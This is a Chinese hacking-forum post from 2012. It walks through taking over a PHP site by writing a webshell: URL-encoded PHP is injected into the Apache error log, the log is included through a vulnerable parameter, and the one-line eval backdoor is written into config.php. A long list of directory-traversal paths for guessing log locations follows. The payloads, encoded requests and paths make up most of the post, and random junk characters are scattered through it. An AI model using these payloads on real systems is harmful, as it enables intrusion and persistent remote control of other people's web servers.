找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2044|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。   L/ P$ K) q; y0 I8 i
+ X* ^6 a; E6 F4 [6 i
比如还是这句一句话木马 ' h' f' X0 N/ W" q  U
<?eval($_POST[cmd]);?>   6 Q8 w$ T2 q1 b5 X5 R9 p

1 K: |, O7 {6 ]  T到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
6 b. E: v  a5 \: rfopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 ' @7 k! j: z% Y: z; G
& |+ `2 i. G; _0 y
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
# k0 f$ Y9 p8 Hfclose($fp);?>   //在config.php里写入一句木马语句
2 C8 U! h$ x& K6 p% `# L- L) P% |, o: J
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 ; ^! ?0 S# n! S+ W' B$ @
转换为
5 R0 s  P) M8 X3 f%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
8 j5 |8 I) @1 t* Q, Jconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
3 ]# X: V* v# h' C* D%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
1 I3 y/ x0 c7 X  }' j' Y2 ~- }fclose%28%24fp%29%3B%3F%3E
, l& j6 |% V/ J9 t- p* U我们提交 " ~' S! O8 l1 v
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww ! J. }; C- G; f7 a- x( u
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp / f/ f* H% s  Q' u* T
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B ! H9 q* F' C3 x: Q. k, [; E% w
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E . _+ T0 F. j' M" a9 `+ F

8 Q* o" n# [" E. }4 r这样就错误日志里就记录下了这行写入webshell的代码。 $ n+ \1 h% a; r: J
我们再来包含日志,提交
2 W% |6 Q* H# J8 p$ c; ~5 T( l- G" Vhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
/ ~& d' o6 k5 q% z1 `3 w/ t% M# M- V( r( m' O7 D
这样webshell就写入成功了,config.php里就写入一句木马语句 ( c# l" j: @: ^4 r
OK.
1 g! F% J# `: Q0 @( f; [8 whttp://www.xxx.com/forum/config.php这个就成了我们的webshell . s( r$ G3 o5 T
直接用lanker的客户端一连,主机就是你的了。 ) J- U% b6 y1 f6 E
, ~5 }) a/ I8 ^4 A/ m* \
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
8 P" G8 k3 B! E/ r+ T9 F/ J7 o3 q4 j4 g4 K% @
其他的日志路径,你可以去猜,也可以参照这里。
: [  w' w) U' ]. ?  L: E/ |8 e. X../../../../../../../../../../var/log/httpd/access_log
( y1 C$ Y2 g! a) M6 Y) H../../../../../../../../../../var/log/httpd/error_log
9 m1 K( b* h$ P& R) t: E% O../apache/logs/error.log
0 j5 k; T( k; z/ P../apache/logs/access.log
) M3 d8 }, B& o( z9 C7 }" T9 {../../apache/logs/error.log
; D6 P' h# E" O, H- a../../apache/logs/access.log
. L  }; @! J) |  G$ P../../../apache/logs/error.log 6 D. }6 `. k3 p& o$ L9 |# x  j
../../../apache/logs/access.log
' `8 R9 D$ A8 p/ X5 y" B../../../../../../../../../../etc/httpd/logs/acces_log 4 e( I0 c. j& V' q
../../../../../../../../../../etc/httpd/logs/acces.log
! h) m* n2 o+ V% ~../../../../../../../../../../etc/httpd/logs/error_log . `! ]) Y6 H. {2 b* q: ]6 C* [
../../../../../../../../../../etc/httpd/logs/error.log
) [0 [0 f- J1 {* P( ?../../../../../../../../../../var/www/logs/access_log
0 z# K* o5 R( P0 L5 B- {3 l../../../../../../../../../../var/www/logs/access.log
* l9 S; k, _3 ]' {& P../../../../../../../../../../usr/local/apache/logs/access_log
0 z) W) Z+ \, G" |2 n5 i../../../../../../../../../../usr/local/apache/logs/access.log : v4 H8 m/ d+ G+ u
../../../../../../../../../../var/log/apache/access_log
8 P) G7 u  W, m8 t../../../../../../../../../../var/log/apache/access.log
0 U. s) J5 e4 ~3 F: @! f../../../../../../../../../../var/log/access_log
8 v) c+ e! T, G4 N$ F% y../../../../../../../../../../var/www/logs/error_log 6 D7 K% p0 b0 U' a$ I# w
../../../../../../../../../../var/www/logs/error.log 6 U% {0 }# z# Q
../../../../../../../../../../usr/local/apache/logs/error_log
; ~( `8 \) t3 i! H5 G../../../../../../../../../../usr/local/apache/logs/error.log ( O5 D+ K) o5 O5 \- f; i
../../../../../../../../../../var/log/apache/error_log 9 b4 I0 q& l& m6 M( F
../../../../../../../../../../var/log/apache/error.log
9 X- C8 X# _6 _../../../../../../../../../../var/log/access_log / J, P! Y7 \* R; H( J+ @* F) i
../../../../../../../../../../var/log/error_log
  y6 R* k3 Z. M$ C/var/log/httpd/access_log       + D, L" W# Z# z0 u! v. ~
/var/log/httpd/error_log     + i$ n0 N0 a( H$ {4 b' ~& }
../apache/logs/error.log     ( D+ ]( S3 ~8 l$ a7 f) U) F
../apache/logs/access.log + g$ K( Q: v, B& _4 E) a  Y
../../apache/logs/error.log / k0 _/ g' M0 P8 V+ ^' ]
../../apache/logs/access.log % t3 P3 n2 m; U
../../../apache/logs/error.log 4 G  ~# u8 M4 c& h/ Q: ~
../../../apache/logs/access.log   z) V- h; O- i# K
/etc/httpd/logs/acces_log
* ^! c( J3 U' G1 ~' e5 h# `- H$ |9 I$ h/etc/httpd/logs/acces.log 8 C- l/ B/ y: Z/ p/ w/ e; |- L
/etc/httpd/logs/error_log 9 Q4 \$ _" W) u! k$ Y
/etc/httpd/logs/error.log
8 {  K$ a3 Y# V! q0 X* u/var/www/logs/access_log
) B9 e2 R' n/ _4 T/var/www/logs/access.log 5 ^) |- m/ }/ _, H% l  x' g
/usr/local/apache/logs/access_log
" v" b& L& v. L/usr/local/apache/logs/access.log
  M( v. ^' |, m3 m% A0 P5 Z; W/var/log/apache/access_log " Z/ z& @9 [5 Z5 D9 G7 {
/var/log/apache/access.log
. C- Q% @1 w- i! C! V7 d/var/log/access_log
8 i1 h( K: E. H$ b2 {2 o( o/var/www/logs/error_log 0 j9 e, ^5 X+ m$ J8 h
/var/www/logs/error.log
1 y2 E" V) R: R( E' Q9 i/usr/local/apache/logs/error_log # i  k0 G; i+ ~5 x! k0 {
/usr/local/apache/logs/error.log 5 t# q3 {. B( j7 D/ ~8 \- [
/var/log/apache/error_log 7 R. c. A6 e6 z" R4 @* D0 n2 x
/var/log/apache/error.log
' T; j1 ~) K8 L- M4 q/var/log/access_log
! k- p4 R  @% J. F+ ]1 u/var/log/error_log
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表